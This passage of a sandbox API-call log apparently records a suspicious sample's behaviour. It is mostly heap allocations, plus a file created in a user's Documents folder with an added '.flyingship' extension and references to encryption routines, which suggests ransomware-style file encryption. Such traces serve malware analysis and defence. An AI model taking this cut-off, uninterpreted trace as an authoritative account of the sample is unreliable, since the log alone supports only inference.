Size=0x10) returned 0x9b9b68 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.738] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.738] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.739] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.739] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0173.740] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0173.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0173.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0173.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0173.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.740] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0173.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0173.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0173.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.740] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0173.740] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.flyingship.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lvw qc5ro32oh.flyingship.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0173.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0173.741] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0173.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.741] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.742] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0173.742] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0173.742] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0173.742] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.742] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.743] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0173.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0173.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0173.743] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0173.743] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0173.747] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x2a51, lpOverlapped=0x0) returned 1 [0173.748] ReadFile (in: hFile=0x138, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0173.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0173.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12a51) returned 0xa7f018 [0173.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0173.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0173.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0173.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12a51) returned 0x9c5180 [0173.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.752] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12a51) returned 0xa7f018 [0173.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0173.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0173.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.752] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0173.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0173.753] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.753] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0173.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0173.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12a51) returned 0xa7f018 [0173.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0173.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0173.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0173.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0173.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0173.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12a51) returned 0x9d7be0 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0173.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0173.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0173.756] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0173.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0173.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0173.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.756] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0173.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26e8 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0173.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.757] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0173.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0173.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0173.758] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0173.758] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0173.758] RtlAllocateHeap 